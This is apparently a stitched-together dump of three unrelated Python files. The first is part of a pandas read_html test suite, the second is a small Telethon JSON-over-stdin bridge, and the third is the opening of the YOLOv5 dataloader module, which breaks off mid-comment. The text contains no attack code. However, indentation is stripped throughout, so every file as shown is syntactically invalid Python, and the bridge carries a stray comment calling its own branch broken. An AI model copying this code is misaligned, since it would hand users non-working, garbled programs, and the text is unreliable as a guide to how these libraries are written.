tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows={1, 2})
df2 = self.read_html(self.spam_data, 'Unit', skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=('is not a valid type '
'for skipping rows')):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert 'No tables found' in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match='No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r'\(you passed a negative value\)'
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
        Make sure that read_html reads tfoot elements that contain td or th
        cells, and ignores an empty tfoot.
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
helper_thread1.join()
helper_thread2.join()
assert None is helper_thread1.err is helper_thread2.err
|
php.py
|
import json
import sys
import threading
from telethon.sync import TelegramClient
import asyncio
updates = []
running = False
def write(array):
print(json.dumps(array, default=str))
async def callback(event):
global updates
updates.append(event.to_dict())
def newCallback():
client.add_event_handler(callback)
client.run_until_disconnected()
def callClient(request):
if running:  # broken: the client's event loop is already being driven by the callback thread
loop = asyncio.get_event_loop()
if isinstance(request['args'], dict):
response = loop.run_until_complete(
getattr(client, request['method'])(**request['args']))
else:
response = loop.run_until_complete(
getattr(client, request['method'])(*request['args']))
try:
response = response.to_dict()
except Exception:
pass
else:
if isinstance(request['args'], dict):
response = getattr(client, request['method'])(**request['args'])
else:
response = getattr(client, request['method'])(*request['args'])
try:
response = response.to_dict()
except Exception:
pass
return response
while True:
try:
request = json.loads(input())
if request['type'] == 'new TelegramClient':
client = TelegramClient(
request['name'], request['api_id'], request['api_hash'])
write({'type': 'response', 'success': True})
if request['type'] == 'exit':
write({'type': 'response', 'success': True})
quit()
if request['type'] == 'TelegramClient':
response = callClient(request)
write({'type': 'response', 'success': True, 'response': response})
if request['type'] == 'new callback':
running = True
threading.Thread(target=newCallback, daemon=True).start()
write({'type': 'response', 'success': True})
if request['type'] == 'getUpdate':
while True:
if updates:
write({'type': 'event', 'event': updates[0]})
del updates[0]
break
except Exception as e:
write({'type': 'error', 'success': False,
'error': str(e), 'exception': type(e).__name__})
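# Illustrative sketch of the stdin/stdout JSON line protocol this bridge speaks
# (the field values below are placeholders, not taken from any real session):
#
#   {"type": "new TelegramClient", "name": "session", "api_id": 12345, "api_hash": "0123abcd"}
#   {"type": "TelegramClient", "method": "get_me", "args": []}
#   {"type": "new callback"}
#   {"type": "getUpdate"}
#   {"type": "exit"}
#
# Every request line is answered with one JSON line written to stdout via write().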
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ImageOps, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, \
xywh2xyxy, xywhn2xyxy, xyxy2xywhn, xyn2xy, LOGGER
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
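# Hedged one-line usage sketch for exif_transpose (the filename is a placeholder):
#   im = exif_transpose(Image.open('photo.jpg'))  # pixels rotated upright, EXIF Orientation tag cleared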
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
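# Hedged usage sketch for create_dataloader(); the dataset path and hyperparameter dict
# below are placeholders, not values shipped with this file:
#
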